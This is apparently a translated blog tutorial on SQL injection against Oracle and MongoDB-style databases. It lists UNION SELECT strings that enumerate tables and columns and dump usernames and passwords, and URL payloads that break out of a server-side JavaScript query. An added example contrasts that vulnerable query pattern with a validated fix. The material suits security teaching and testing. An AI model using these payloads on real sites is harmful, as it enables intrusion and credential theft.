Basic SQL injection for Oracle and Mdb databases

0x00 Introduction to SQL injection

Commonly injected databases: MySQL, MSSQL, Oracle, Mdb, PostgreSQL, etc.
Types of SQL injection: numeric, character (string), etc.
Submission methods: POST, GET, HTTP headers in the request, cookies, etc.
Other injection methods: second-order injection, out-of-band injection testing, etc.

0x01 Basic injection statements for Oracle

Oracle stores table names in user_tables.
In addition to general query statements, fuzzy (LIKE) queries are usually used to find relevant user tables.
Test for echoed output: and 1=2 union select '1','2' from dual
Enumerate database: and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
Enumerate database with a fuzzy match: and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
Enumerate column name: and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual
Enumerate other column names: and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual
Dump data: and 1=2 union select user_name,user_pwd from "sns_users"
Dump other data: and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

0x02 Basic injection statements for Mdb

Note that the closing sequence for Mdb is '{(1'});
Test for echoed output: /new_list.php?id=1'}); return ({title:1,content:'2
Enumerate database: /new_list.php?id=1'}); return ({title:tojson(db),content:'1
Enumerate tables: /new_list.php?id=1'}); return({title:tojson(db.getCollectionNames()), content:'1
Enumerate fields: /new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1

db.getCollectionNames() returns an array, which must be converted to a string with tojson.
db.Authority_confidential is the collection (table) currently in use; the find function runs the query, and [0] selects the first record.
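
Why the closing sequence in the Mdb requests above works, and how the lookup is fixed, as an added example that is not code from the original post. The script template, the notice collection name and the db stub are assumptions, since the page shows only the request values.

```javascript
// Added example. ASSUMPTION: the page does not show the server-side code;
// this template and the "notice" collection are hypothetical stand-ins.

// Stub for the database handle, with constructed sample data.
const db = {
  notice: {
    findOne: (q) => (String(q.id) === '1' ? { title: 'hello', content: 'world' } : null),
  },
};

// VULNERABLE: the request value is pasted into script source text, so a
// quote plus "});" ends the query and whatever follows runs as code.
function buildScriptUnsafe(id) {
  return "var data = db.notice.findOne({'id':'" + id + "'}); return data;";
}

function lookupUnsafe(id) {
  return new Function('db', buildScriptUnsafe(id))(db);
}

// HARDENED: validate the id, then pass it as a typed value in a query
// document. No script text is assembled from request data.
function lookupSafe(id) {
  if (!/^[0-9]{1,10}$/.test(id)) {
    throw new RangeError('id must be a decimal integer');
  }
  return db.notice.findOne({ id: Number(id) });
}

// Helper so a rejection can be observed without an uncaught exception.
function trySafe(id) {
  try {
    return lookupSafe(id);
  } catch (e) {
    return 'rejected';
  }
}

// The id value from the page's echo test request.
const PAGE_TEST_ECHO = "1'}); return ({title:1,content:'2";

console.log(buildScriptUnsafe(PAGE_TEST_ECHO)); // script now has two return statements
console.log(lookupUnsafe(PAGE_TEST_ECHO));      // response fields come from the request
console.log(trySafe(PAGE_TEST_ECHO));           // hardened path refuses the value
```
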

Origin blog.csdn.net/qq_53577336/article/details/127504279